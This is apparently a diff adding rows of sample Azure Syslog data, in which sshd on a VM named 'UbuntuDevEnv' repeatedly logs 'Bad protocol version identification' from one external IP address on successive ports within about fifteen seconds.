+172,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:14,UbuntuDevEnv,2019-06-28 11:21:13,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2626,50025,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2626,,
+173,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:14,UbuntuDevEnv,2019-06-28 11:21:13,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2627,50026,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2627,,
+174,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:14,UbuntuDevEnv,2019-06-28 11:21:14,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2628,50029,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2628,,
+175,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:14,UbuntuDevEnv,2019-06-28 11:21:14,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2629,50034,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2629,,
+176,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:15,UbuntuDevEnv,2019-06-28 11:21:14,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2630,50035,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2630,,
+177,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:15,UbuntuDevEnv,2019-06-28 11:21:14,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2631,50036,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2631,,
+178,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:15,UbuntuDevEnv,2019-06-28 11:21:15,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2632,50037,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2632,,
+179,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:16,UbuntuDevEnv,2019-06-28 11:21:15,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2633,50040,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2633,,
+180,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:16,UbuntuDevEnv,2019-06-28 11:21:15,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2634,50041,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2634,,
+181,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:16,UbuntuDevEnv,2019-06-28 11:21:16,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2635,50042,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2635,,
+182,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:16,UbuntuDevEnv,2019-06-28 11:21:16,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2636,50044,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2636,,
+183,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:17,UbuntuDevEnv,2019-06-28 11:21:16,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2637,50046,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2637,,
+184,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:17,UbuntuDevEnv,2019-06-28 11:21:16,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2638,50047,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2638,,
+185,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:17,UbuntuDevEnv,2019-06-28 11:21:17,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2639,50048,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2639,,
+186,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:17,UbuntuDevEnv,2019-06-28 11:21:17,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2640,50050,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2640,,
+187,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:18,UbuntuDevEnv,2019-06-28 11:21:17,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2641,50052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2641,,
+188,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:18,UbuntuDevEnv,2019-06-28 11:21:17,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2816,50053,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2816,,
+189,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:18,UbuntuDevEnv,2019-06-28 11:21:18,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2817,50054,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2817,,
+190,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:18,UbuntuDevEnv,2019-06-28 11:21:18,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2642,50056,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2642,,
+191,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:19,UbuntuDevEnv,2019-06-28 11:21:18,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2643,50058,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2643,,
+192,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:19,UbuntuDevEnv,2019-06-28 11:21:18,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2644,50059,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2644,,
+193,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:19,UbuntuDevEnv,2019-06-28 11:21:19,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2645,50060,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2645,,
+194,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:19,UbuntuDevEnv,2019-06-28 11:21:19,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2646,50067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2646,,
+195,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:20,UbuntuDevEnv,2019-06-28 11:21:19,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2647,50068,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2647,,
+196,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:20,UbuntuDevEnv,2019-06-28 11:21:19,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2648,50069,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2648,,
+197,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:20,UbuntuDevEnv,2019-06-28 11:21:20,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2649,50070,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2649,,
+198,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:20,UbuntuDevEnv,2019-06-28 11:21:20,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2650,50073,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2650,,
+199,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:21,UbuntuDevEnv,2019-06-28 11:21:20,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2818,50074,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2818,,
+200,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:21,UbuntuDevEnv,2019-06-28 11:21:21,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2819,50075,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2819,,
+201,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:21,UbuntuDevEnv,2019-06-28 11:21:21,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2820,50077,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2820,,
+202,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:22,UbuntuDevEnv,2019-06-28 11:21:21,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2821,50079,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2821,,
+203,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:22,UbuntuDevEnv,2019-06-28 11:21:21,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2822,50085,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2822,,
+204,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:22,UbuntuDevEnv,2019-06-28 11:21:22,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2823,50086,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2823,,
+205,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:22,UbuntuDevEnv,2019-06-28 11:21:22,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2824,50088,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2824,,
+206,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:23,UbuntuDevEnv,2019-06-28 11:21:22,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2828,50090,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2828,,
+207,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:23,UbuntuDevEnv,2019-06-28 11:21:22,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2830,50091,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2830,,
+208,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:23,UbuntuDevEnv,2019-06-28 11:21:23,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2651,50092,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2651,,
+209,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:23,UbuntuDevEnv,2019-06-28 11:21:23,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2652,50094,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2652,,
+210,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:24,UbuntuDevEnv,2019-06-28 11:21:23,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2843,50096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2843,,
+211,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:24,UbuntuDevEnv,2019-06-28 11:21:23,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2845,50097,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2845,,
+212,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:24,UbuntuDevEnv,2019-06-28 11:21:24,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2846,50098,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2846,,
+213,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:24,UbuntuDevEnv,2019-06-28 11:21:24,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2848,50105,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2848,,
+214,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:25,UbuntuDevEnv,2019-06-28 11:21:24,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2852,50106,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2852,,
+215,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:25,UbuntuDevEnv,2019-06-28 11:21:24,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2856,50107,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2856,,
+216,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:25,UbuntuDevEnv,2019-06-28 11:21:25,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2857,50108,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2857,,
+217,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:25,UbuntuDevEnv,2019-06-28 11:21:25,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2653,50111,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2653,,
+218,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:26,UbuntuDevEnv,2019-06-28 11:21:25,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2654,50112,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2654,,
+219,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:26,UbuntuDevEnv,2019-06-28 11:21:25,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2655,50113,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2655,,
+220,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:26,UbuntuDevEnv,2019-06-28 11:21:26,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2656,50115,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2656,,
+221,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:26,UbuntuDevEnv,2019-06-28 11:21:26,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2657,50118,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2657,,
+222,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:27,UbuntuDevEnv,2019-06-28 11:21:26,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2859,50119,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2859,,
+223,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:27,UbuntuDevEnv,2019-06-28 11:21:27,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2861,50120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2861,,
+224,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:27,UbuntuDevEnv,2019-06-28 11:21:27,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2862,50121,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2862,,
+225,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:28,UbuntuDevEnv,2019-06-28 11:21:27,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2863,50125,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2863,,
+226,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:28,UbuntuDevEnv,2019-06-28 11:21:27,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2864,50126,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2864,,
+227,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:28,UbuntuDevEnv,2019-06-28 11:21:28,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2865,50127,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2865,,
+228,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:28,UbuntuDevEnv,2019-06-28 11:21:28,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2866,50129,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2866,,
+229,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:29,UbuntuDevEnv,2019-06-28 11:21:28,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2867,50131,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2867,,
+230,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:29,UbuntuDevEnv,2019-06-28 11:21:28,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2868,50132,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2868,,
+231,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 11:21:29,UbuntuDevEnv,2019-06-28 11:21:29,auth,UbuntuDevEnv,info,Bad protocol version identification '\026\003\001' from 52.137.93.128 port 2869,50133,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,52.137.93.1,2869,,
